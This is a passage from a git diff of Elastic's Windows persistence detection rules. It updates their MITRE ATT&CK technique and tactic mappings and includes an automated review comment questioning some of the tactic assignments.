 id = "T1547.001"
 name = "Registry Run Keys / Startup Folder"
 reference = "https://attack.mitre.org/techniques/T1547/001/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1112"
+name = "Modify Registry"
+reference = "https://attack.mitre.org/techniques/T1112/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
index 5152e42debf..426b00a56db 100644
--- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
+++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/19"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -89,19 +89,84 @@ sequence by host.id, user.name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = 
"https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml index d5fd087cd9d..0cdd460da69 100644 --- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml +++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,24 +102,36 @@ any where host.os.type == "windows" and event.code == "5136" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml index cbd24408d74..c5f743170f9 100644 --- a/rules/windows/persistence_service_dll_unsigned.toml 
+++ b/rules/windows/persistence_service_dll_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -167,53 +167,64 @@ Svchost.exe is a critical Windows process that hosts multiple services, allowing [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml index e142ec77150..4907ef082e4 100644 --- a/rules/windows/persistence_services_registry.toml +++ b/rules/windows/persistence_services_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,31 +117,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index 7fa5626eea9..30186fd049e 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -154,48 +154,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.015" -name = "Component Object Model Hijacking" -reference = "https://attack.mitre.org/techniques/T1546/015/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml index fcea266ea46..288d3035d09 100644 --- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml +++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml 
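Review bot: T1112 (Modify Registry) is folded into the TA0003 Persistence entry in the second hunk, but in ATT&CK that technique belongs to Defense Evasion only, so the new mapping pairs a technique with a tactic it is not part of; the same pairing is introduced in persistence_time_provider_mod.toml and persistence_via_wmi_stdregprov_run_services.toml. The pre-change layout, a separate `[[rule.threat]]` with `id = "TA0005"`, was the correct home for T1112, and any CI check that validates technique-to-tactic membership is likely to reject the new form. Separately, removing the whole TA0004 Privilege Escalation entry takes this rule out of that tactic's coverage even though T1546.015 is listed under both Persistence and Privilege Escalation in ATT&CK; the same removal happens in persistence_time_provider_mod.toml, persistence_via_application_shimming.toml and persistence_via_telemetrycontroller_scheduledtask_hijack.toml, and the de-duplication intent is visible from the removed entries repeating the same techniques. The `tags` list is outside every one of these hunks, so confirm that `Tactic: Privilege Escalation` is dropped and `Tactic: Defense Evasion` is kept wherever the threat entries changed.
```toml
# … unchanged: Persistence entry (T1546 / T1546.015 → TA0003), with the T1112 technique block removed from it …

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1112"
name = "Modify Registry"
reference = "https://attack.mitre.org/techniques/T1112/"

[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
```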
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -147,36 +147,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index ed301eb30bb..9a17c463d7f 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -122,36 +122,81 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.002" +name = "Control Panel" +reference = "https://attack.mitre.org/techniques/T1218/002/" +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = 
"https://attack.mitre.org/techniques/T1218/009/" +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[[rule.threat.technique]] +id = "T1220" +name = "XSL Script Processing" +reference = "https://attack.mitre.org/techniques/T1220/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml index e3c5bf98f82..5706fc3e315 100644 --- a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml +++ b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,27 +86,31 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] +[[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 2a0d907bce6..a3b0b221fdb 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -120,27 +120,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -151,10 +154,17 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index fbc8a28fda9..9ec575d97b2 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,36 +74,18 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 7b99257a7d9..d4d2d46de13 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -137,36 +137,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.003" -name = "Time Providers" -reference = "https://attack.mitre.org/techniques/T1547/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index 708d2187cb4..9143335a022 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/04/24" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Skoetting"] 
@@ -102,14 +102,18 @@ iam where host.os.type == "windows" and event.action == "added-member-to-group" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 2bab46a9d12..5fff35a5c75 100644 --- a/rules/windows/persistence_user_account_creation.toml +++ b/rules/windows/persistence_user_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 1fb717e1aa7..78c51316c02 100644 --- a/rules/windows/persistence_via_application_shimming.toml 
+++ b/rules/windows/persistence_via_application_shimming.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,36 +101,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.011" -name = "Application Shimming" -reference = "https://attack.mitre.org/techniques/T1546/011/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 1d217e04fb3..249be5b3caf 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -97,43 +97,49 @@ registry where host.os.type == "windows" and event.type == "change" and length(r [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index 5ce887dd079..cd8b93affc2 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -96,46 +96,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index 4c77031fe53..5460a9a109a 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -147,36 +147,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack 